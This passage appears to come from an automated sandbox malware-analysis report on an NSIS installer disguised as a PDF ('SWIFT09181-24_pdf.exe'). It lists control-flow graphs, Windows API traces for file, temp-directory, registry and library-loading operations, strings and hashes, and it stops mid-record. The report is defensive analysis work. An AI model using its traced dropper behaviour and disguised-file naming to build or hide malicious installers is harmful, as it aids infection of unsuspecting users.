                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                    • String ID: "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SWIFT09181-24_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 4283519449-3681622501
                                                                                                                                    • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                    • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                    • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                    • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 626 401767-40178c call 402bbf call 405a80 631 401796-4017a8 call 406055 call 405a09 lstrcatW 626->631 632 40178e-401794 call 406055 626->632 638 4017ad-4017ae call 4062e9 631->638 632->638 641 4017b3-4017b7 638->641 642 4017b9-4017c3 call 406398 641->642 643 4017ea-4017ed 641->643 650 4017d5-4017e7 642->650 651 4017c5-4017d3 CompareFileTime 642->651 645 4017f5-401811 call 405c2a 643->645 646 4017ef-4017f0 call 405c05 643->646 653 401813-401816 645->653 654 401885-4018ae call 4051b4 call 403027 645->654 646->645 650->643 651->650 655 401867-401871 call 4051b4 653->655 656 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 653->656 668 4018b0-4018b4 654->668 669 4018b6-4018c2 SetFileTime 654->669 666 40187a-401880 655->666 656->641 689 40185c-40185d 656->689 670 402a55 666->670 668->669 672 4018c8-4018d3 CloseHandle 668->672 669->672 676 402a57-402a5b 670->676 674 4018d9-4018dc 672->674 675 402a4c-402a4f 672->675 678 4018f1-4018f4 call 406077 674->678 679 4018de-4018ef call 406077 lstrcatW 674->679 675->670 683 4018f9-40228d call 40579a 678->683 679->683 683->676 689->666 691 40185f-401860 689->691 691->655
                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017A8
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017CD
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\nsw967F.tmp$C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dll$Call
                                                                                                                                    • API String ID: 1941528284-205049977
                                                                                                                                    • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                    • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                    • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                    • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-403050 692->694 693->694 695 403052 694->695 696 403059-40305e 694->696 695->696 697 403060-403069 call 403258 696->697 698 40306e-40307b call 403242 696->698 697->698 702 403230 698->702 703 403081-403085 698->703 704 403232-403233 702->704 705 4031db-4031dd 703->705 706 40308b-4030d4 GetTickCount 703->706 709 40323b-40323f 704->709 707 40321d-403220 705->707 708 4031df-4031e2 705->708 710 403238 706->710 711 4030da-4030e2 706->711 712 403222 707->712 713 403225-40322e call 403242 707->713 708->710 714 4031e4 708->714 710->709 715 4030e4 711->715 716 4030e7-4030f5 call 403242 711->716 712->713 713->702 725 403235 713->725 718 4031e7-4031ed 714->718 715->716 716->702 724 4030fb-403104 716->724 721 4031f1-4031ff call 403242 718->721 722 4031ef 718->722 721->702 730 403201-40320d call 405cdc 721->730 722->721 727 40310a-40312a call 40654a 724->727 725->710 734 403130-403143 GetTickCount 727->734 735 4031d3-4031d5 727->735 736 4031d7-4031d9 730->736 737 40320f-403219 730->737 738 403145-40314d 734->738 739 40318e-403190 734->739 735->704 736->704 737->718 740 40321b 737->740 741 403155-40318b MulDiv wsprintfW call 4051b4 738->741 742 40314f-403153 738->742 743 403192-403196 739->743 744 4031c7-4031cb 739->744 740->710 741->739 742->739 742->741 747 403198-40319f call 405cdc 743->747 748 4031ad-4031b8 743->748 744->711 745 4031d1 744->745 745->710 753 4031a4-4031a6 747->753 749 4031bb-4031bf 748->749 749->727 752 4031c5 749->752 752->710 753->736 754 4031a8-4031ab 753->754 754->749
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                    • String ID: jA$ jA$... %d%%
                                                                                                                                    • API String ID: 551687249-2167919867
                                                                                                                                    • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                    • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                                    • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                                                    • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 755 4025e5-4025fa call 402ba2 758 402600-402607 755->758 759 402a4c-402a4f 755->759 760 402609 758->760 761 40260c-40260f 758->761 762 402a55-402a5b 759->762 760->761 763 402773-40277b 761->763 764 402615-402624 call 405fb5 761->764 763->759 764->763 768 40262a 764->768 769 402630-402634 768->769 770 4026c9-4026cc 769->770 771 40263a-402655 ReadFile 769->771 772 4026e4-4026f4 call 405cad 770->772 773 4026ce-4026d1 770->773 771->763 774 40265b-402660 771->774 772->763 784 4026f6 772->784 773->772 775 4026d3-4026de call 405d0b 773->775 774->763 777 402666-402674 774->777 775->763 775->772 780 40267a-40268c MultiByteToWideChar 777->780 781 40272f-40273b call 405f9c 777->781 780->784 785 40268e-402691 780->785 781->762 788 4026f9-4026fc 784->788 786 402693-40269e 785->786 786->788 789 4026a0-4026c5 SetFilePointer MultiByteToWideChar 786->789 788->781 790 4026fe-402703 788->790 789->786 791 4026c7 789->791 792 402740-402744 790->792 793 402705-40270a 790->793 791->784 794 402761-40276d SetFilePointer 792->794 795 402746-40274a 792->795 793->792 796 40270c-40271f 793->796 794->763 798 402752-40275f 795->798 799 40274c-402750 795->799 796->763 797 402721-402727 796->797 797->769 800 40272d 797->800 798->763 799->794 799->798 800->763
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                      • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                    • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                                    • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                                    • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 801 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 808 4023c7-4023cf 801->808 809 402a4c-402a5b 801->809 810 4023d1-4023de call 402bbf lstrlenW 808->810 811 4023e2-4023e5 808->811 810->811 814 4023f5-4023f8 811->814 815 4023e7-4023f4 call 402ba2 811->815 819 402409-40241d RegSetValueExW 814->819 820 4023fa-402404 call 403027 814->820 815->814 823 402422-4024fc RegCloseKey 819->823 824 40241f 819->824 820->819 823->809 826 40281e-402825 823->826 824->823 826->809
                                                                                                                                    APIs
                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw967F.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw967F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw967F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsw967F.tmp
                                                                                                                                    • API String ID: 1356686001-1399413536
                                                                                                                                    • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                    • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                                                    • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                                                    • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 827 405683-4056ce CreateDirectoryW 828 4056d0-4056d2 827->828 829 4056d4-4056e1 GetLastError 827->829 830 4056fb-4056fd 828->830 829->830 831 4056e3-4056f7 SetFileSecurityW 829->831 831->828 832 4056f9 GetLastError 831->832 832->830
                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                    • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 3449924974-3081826266
                                                                                                                                    • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                                                    • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                                                    • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 833 10001759-10001795 call 10001b18 837 100018a6-100018a8 833->837 838 1000179b-1000179f 833->838 839 100017a1-100017a7 call 10002286 838->839 840 100017a8-100017b5 call 100022d0 838->840 839->840 845 100017e5-100017ec 840->845 846 100017b7-100017bc 840->846 847 1000180c-10001810 845->847 848 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 845->848 849 100017d7-100017da 846->849 850 100017be-100017bf 846->850 854 10001812-1000184c call 100015b4 call 100024a9 847->854 855 1000184e-10001854 call 100024a9 847->855 871 10001855-10001859 848->871 849->845 856 100017dc-100017dd call 10002b5f 849->856 852 100017c1-100017c2 850->852 853 100017c7-100017c8 call 100028a4 850->853 859 100017c4-100017c5 852->859 860 100017cf-100017d5 call 10002645 852->860 866 100017cd 853->866 854->871 855->871 869 100017e2 856->869 859->845 859->853 870 100017e4 860->870 866->869 869->870 870->845 875 10001896-1000189d 871->875 876 1000185b-10001869 call 1000246c 871->876 875->837 881 1000189f-100018a0 GlobalFree 875->881 883 10001881-10001888 876->883 884 1000186b-1000186e 876->884 881->837 883->875 886 1000188a-10001895 call 1000153d 883->886 884->883 885 10001870-10001878 884->885 885->883 887 1000187a-1000187b FreeLibrary 885->887 886->875 887->883
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                      • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                      • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                      • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                      • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                                                    • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                    • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                    • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                    • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 890 405c59-405c65 891 405c66-405c9a GetTickCount GetTempFileNameW 890->891 892 405ca9-405cab 891->892 893 405c9c-405c9e 891->893 895 405ca3-405ca6 892->895 893->891 894 405ca0 893->894 894->895
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                    • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                    • API String ID: 1716503409-678247507
                                                                                                                                    • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                    • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                    • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 896 4063bf-4063df GetSystemDirectoryW 897 4063e1 896->897 898 4063e3-4063e5 896->898 897->898 899 4063f6-4063f8 898->899 900 4063e7-4063f0 898->900 902 4063f9-406428 wsprintfW LoadLibraryW 899->902 900->899 901 4063f2-4063f4 900->901 901->902
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                    • wsprintfW.USER32 ref: 00406411
                                                                                                                                    • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                    • String ID: %s%S.dll
                                                                                                                                    • API String ID: 2200240437-2744773210
                                                                                                                                    • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                    • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
